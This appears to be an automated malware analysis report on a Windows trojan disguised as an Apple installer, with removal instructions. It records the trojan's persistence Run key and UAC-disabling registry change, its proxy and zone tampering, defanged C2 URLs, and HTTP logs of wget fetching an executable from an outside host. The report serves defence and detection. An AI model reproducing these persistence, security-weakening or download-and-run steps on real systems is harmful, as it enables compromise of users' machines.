Trojan.Win32.VB.ctxv (Kaspersky), Trojan.Generic.12567452 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: caa9e435539539ab5f1379cc66fc2e5c
SHA1: 7bb1bb2599a88bee965e2f81c682a0382d79650d
SHA256: 456cd7e5281b43d0d45589abdc64c49fd21c008699d2b3b4cada0418545dfce2
SSDeep: 12288:MNIQAPGsAqY9IMVYd38sJdpQHlGlY8KfTLIPThlEg1rZonoSbMfU48iPGZhzwbpy:NPGSY91VwNJcFMqTLIPThlEg1rZonoSj
Size: 684667 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualCv71EXE, MicrosoftVisualCv70, UPolyXv05_v6
Company: Dummy, Ltd.
Created at: 2009-09-25 21:57:32
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
schtasks.exe:1300
schtasks.exe:580
wget.exe:1668
%original file name%.exe:1532
Charles.exe:452
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process wget.exe:1668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\arsiv.exe (3733282 bytes)
The process %original file name%.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Charles.exe (3821 bytes)
The process Charles.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\king.js (196 bytes)
%Documents and Settings%\%current user%\Application Data\ok.txt (9 bytes)
%Documents and Settings%\%current user%\Application Data\wget.exe (1333 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\key.txt (249 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (32 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\key.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\ok.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\update.txt (0 bytes)
Registry activity
The process schtasks.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 BC 0B 19 9E FD E8 A9 EC 81 4B 4B 27 96 80 07"
The process schtasks.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 5C 38 5F FE AC C3 D5 AC 76 BF F0 7E E1 12 3A"
The process wget.exe:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 E4 22 23 D4 FC 83 45 6F 91 26 E7 99 30 AA 98"
The process %original file name%.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 9A 1C DB 27 4C 3D 1D 59 EB AC 1C CD 8D DC 44"
The process Charles.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Kingsoft]
"id_key" = "ceojbakbelhblkacoondeaabhglmaljj#MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC5GQXVHGmSH/54uXHqn3P3Y3puRpkdxZXzHEfJ8X4DBnfsNcDBUsuPP9h5WEjIVFMPJcBhhQDPJxt6OPqd75deFXyR6DPtEeCpVkbj6cIH902ufevt JLDT/DwkmfJL9AYu57br gEWKFVqBhHqu6woVtgGcVDoy4ngJZ7OzZwDQIDAQAB"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 19 3F F3 CA B4 8A 5B CF 74 2C EF C0 49 BA 5B"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Google Charles" = "%Documents and Settings%\%current user%\Application Data\Charles.exe"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
f98d5a7924143f6e687dd92d9af8f3a9 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\wget.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
schtasks.exe:1300
schtasks.exe:580
wget.exe:1668
%original file name%.exe:1532
Charles.exe:452
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Application Data\arsiv.exe (3733282 bytes)
%Documents and Settings%\%current user%\Application Data\Charles.exe (3821 bytes)
%Documents and Settings%\%current user%\Application Data\king.js (196 bytes)
%Documents and Settings%\%current user%\Application Data\ok.txt (9 bytes)
%Documents and Settings%\%current user%\Application Data\wget.exe (1333 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\key.txt (249 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (32 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Google Charles" = "%Documents and Settings%\%current user%\Application Data\Charles.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name: Apple Inc.
Product Name:
Product Version:
Legal Copyright: Apple Inc.
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 9.1.2
File Description: Apple Inc. 9.1.2 Installation
Comments:
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 362198 | 362496 | 4.62615 | 06fb96e5de678ab3654b8cba9be7b4b3 |
.rdata | 368640 | 42792 | 43008 | 3.73288 | a86a7956fff826cfae8192f9e4d6248d |
.data | 413696 | 31396 | 8192 | 2.70063 | f9f09007f34890bdde82a8b299b3f02b |
.rsrc | 446464 | 180224 | 178688 | 3.66951 | 0a554cf9f2a1fddeef1b4c7f8107f215 |
Network Activity
URLs
URL | IP |
---|---|
hxxp://146.185.189.62/ahk/req.php?type=arsiv_hash | |
hxxp://146.185.189.62/ahk/req.php?type=arsiv_link | |
hxxp://178.62.177.241/app.exe | |
hxxp://www.filmverme.com:80/ahk/req.php?type=arsiv_link | |
hxxp://www.filmverme.com/ahk/req.php?type=arsiv_hash | |
hxxp://178.62.177.241:80/app.exe | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /app.exe HTTP/1.0
User-Agent: Wget/1.5.3.1
Host: 178.62.177.241:80
Accept: */*
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Mar 2015 19:14:07 GMT
Content-Type: application/octet-stream
Content-Length: 31990778
Last-Modified: Fri, 13 Mar 2015 01:44:12 GMT
Connection: close
ETag: "550240ec-1e823fa"
Accept-Ranges: bytes
<<< skipped >>>
GET /ahk/req.php?type=arsiv_link HTTP/1.0
User-Agent: Wget/1.5.3.1
Host: VVV.filmverme.com:80
Accept: */*
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sat, 14 Mar 2015 19:14:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.4.17
Location: hXXp://178.62.177.241/app.exe
GET /ahk/req.php?type=arsiv_hash HTTP/1.1
User-Agent: AutoHotkey
Host: VVV.filmverme.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Mar 2015 19:14:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
20..0c4950e06182df940d3e841551aa4378..0..
Strings from Dumps